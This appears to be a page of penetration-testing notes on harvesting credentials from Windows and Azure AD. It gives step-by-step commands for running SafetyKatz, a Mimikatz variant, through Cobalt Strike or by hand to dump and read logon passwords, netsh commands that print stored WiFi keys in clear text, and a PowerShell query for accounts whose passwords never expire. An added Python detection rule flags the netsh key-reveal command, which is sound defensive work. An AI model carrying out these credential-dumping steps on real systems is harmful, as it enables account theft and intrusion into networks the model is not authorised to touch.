Credentials

Mimikatz Alternatives:

Syntax:  {variable-placeholder}

without -c {cmd} returns a cmd shell 

SafetyKatz (https://github.com/GhostPack/SafetyKatz):

  • C# instantiation of Mimikatz

Via Cobalt Strike Beacon:

  • Compile with VS Community (if not already done)

  • From Beacon:  execute-assembly SafetyKatz.exe

Manual Method:

  • Copy SafetyKatz.exe to host

  • Execute SafetyKatz.exe

  • download C:\WINDOWS\Temp\debug808.bin

  • copy to creds folder...

  • mv debug808.bin debug808.gz

  • gzip -d debug808.gz

  • "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full"

Harvest Plain-Text WiFi Creds from Windows:

  • Open an admin command prompt

  • netsh wlan show profile
    * Lists all wireless profiles

  • netsh wlan show profile name="tgt-profiles" key=clear
    * Reveals the PSK
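
Detection side of the netsh step above, as an added example that is not part of the original page: it flags process-creation events whose command line asks netsh for a WLAN key in clear text. The CommandLine and User field names follow Sysmon Event ID 1; the flat record layout, the Computer key, and all sample events are constructed assumptions.

```python
import re

# "netsh ... wlan ... key=clear", tolerating a full path, quoting, mixed case,
# extra whitespace, and a wrapping "cmd.exe /c".
NETSH_WLAN_CLEAR = re.compile(
    r'(?:^|[\\/\s"])netsh(?:\.exe)?"?\s+wlan\s+.*?\bkey\s*=\s*"?clear\b',
    re.IGNORECASE,
)
PROFILE_NAME = re.compile(r'\bname\s*=\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def reveals_wlan_key(command_line):
    """True when the command line asks netsh to print a WLAN key in clear text."""
    return bool(NETSH_WLAN_CLEAR.search(command_line or ""))


def scan(events):
    """Return one finding per process-creation event that requests key=clear."""
    findings = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if not reveals_wlan_key(cmd):
            continue
        m = PROFILE_NAME.search(cmd)
        findings.append({
            "host": ev.get("Computer"),
            "user": ev.get("User"),
            "profile": (m.group(1) or m.group(2)) if m else None,
            "command_line": cmd,
        })
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": "CORP\\alice", "CommandLine": "netsh wlan show profile"},
    {"Computer": "WS01", "User": "CORP\\alice",
     "CommandLine": 'netsh wlan show profile name="tgt-profiles" key=clear'},
    {"Computer": "WS02", "User": "CORP\\bob",
     "CommandLine": '"C:\\Windows\\System32\\netsh.exe" WLAN show profile name=CorpWiFi KEY=clear'},
    {"Computer": "WS03", "User": "CORP\\carol",
     "CommandLine": 'cmd.exe /c netsh  wlan show profiles name="Guest Net" key=clear'},
    {"Computer": "WS03", "User": "CORP\\carol", "CommandLine": "netsh advfirewall show allprofiles"},
    {"Computer": "WS04", "User": "CORP\\dave", "CommandLine": "findstr key=clear notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']} profile={f['profile']!r}: {f['command_line']}")
```

Plain profile listing (no key=clear) and unrelated netsh contexts are left unflagged, which keeps the rule quiet on routine wireless troubleshooting.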

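Azure-AD:

Search for Users Whose Password Never Expires:

  • Get-AzureADUser -All $true | Select-Object UserPrincipalName, @{N="PasswordNeverExpires";E={$_.PasswordPolicies -match "DisablePasswordExpiration"}}
    * PasswordPolicies is a single string that may list several policies, hence the substring match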


Pentest-Zen (ExitC0de00c.com)